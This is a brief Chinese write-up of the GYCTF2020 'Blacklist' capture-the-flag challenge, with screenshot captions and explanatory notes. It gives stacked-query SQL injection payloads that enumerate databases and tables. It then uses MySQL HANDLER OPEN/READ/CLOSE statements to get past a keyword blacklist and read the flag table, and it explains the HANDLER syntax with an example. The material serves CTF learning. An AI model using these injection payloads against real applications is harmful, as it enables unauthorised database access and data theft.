[GYCTF2020]Blacklist

[GYCTF2020]Blacklist

[GYCTF2020]Blacklist_第1张图片

payload:1'

payload:1';show databases;

[GYCTF2020]Blacklist_第2张图片

payload:1';show tables;

[GYCTF2020]Blacklist_第3张图片

payload: 1';select * from FlagHere;

[GYCTF2020]Blacklist_第4张图片

这里过滤了很多敏感字符

payload: 1';

HANDLER FlagHere OPEN;

HANDLER FlagHere READ FIRST;

HANDLER FlagHere CLOSE;

[GYCTF2020]Blacklist_第5张图片

 

处理程序语句(HANDLER Statement)

HANDLER tbl_name OPEN [ [AS] alias]

 

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)

[ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }

[ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name READ { FIRST | NEXT }

[ WHERE where_condition ] [LIMIT ... ]

该语句提供对表存储引擎接口的直接访问。它可用于表

该语句将打开一个表,使其可使用后续语句进行访问。此表对象不由其他会话共享,并且在会话调用或会话终止之前不会关闭。

HANDLER ... OPENHANDLER ... READHANDLER ... CLOSE

HANDLER tbl_name CLOSE

例:

mysql> show tables;

+----------------+

| Tables_in_test |

+----------------+

| users |

| word1 |

+----------------+

2 rows in set (0.00 sec)

 

mysql> HANDLER users OPEN;

Query OK, 0 rows affected (0.39 sec)

 

mysql> HANDLER users READ FIRST;

+----+----------+----------+

| id | username | password |

+----+----------+----------+

| 1 | Bob | 123456 |

+----+----------+----------+

1 row in set (0.00 sec)

 

mysql> HANDLER users CLOSE;

Query OK, 0 rows affected (0.00 sec)

你可能感兴趣的:([GYCTF2020]Blacklist)